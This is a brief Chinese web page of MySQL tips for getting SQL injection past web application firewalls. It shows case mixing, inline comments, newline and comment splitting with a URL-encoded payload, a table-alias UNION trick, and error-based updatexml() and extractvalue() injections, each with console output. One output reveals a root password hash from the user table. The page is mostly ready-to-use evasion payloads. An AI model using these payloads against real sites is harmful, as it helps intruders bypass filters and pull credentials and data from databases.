1、转换大小写 1 2 3 4 5 6 7 mysql> SeLECt 1,2; +---+---+ | 1 | 2 | +---+---+ | 1 | 2 | +---+---+ 1 row in set (0.02 sec) 2、内联注释 1 2 3 4 5 6 7 mysql> /*!select*//**/1,2; +---+---+ | 1 | 2 | +---+---+ | 1 | 2 | +---+---+ 1 row in set (0.00 sec) 3、换行 HdhCmsTest2cto测试数据 1 2 3 4 5 6 7 8 9 10 11 12 mysql > select -> #abc -> 1, -> 2 -> #abc -> ; +---+---+ | 1 | 2 | +---+---+ | 1 | 2 | +---+---+ 1 row in set (0.06 sec) url---->select%0a%23abc%0a1,%0a2#23abc 4、表后面加xxx 1 2 3 4 5 6 7 8 mysql> select user,password from user xxx union select(1),(2); +------+-------------------------------------------+ | user | password | +------+-------------------------------------------+ | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B | | 1 | 2 | +------+-------------------------------------------+ 2 rows in set (0.08 sec) 5、冷门函数 1 2 3 and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1)) and extractvalue(1, concat(0x5c, (select user()),0x5c)); 不过这两条语句要报错模式,msyql版本大于5.1 ps:后续更新。
查看更多关于WAF绕过tips----mysql - 网站安全 - 自学php的详细内容...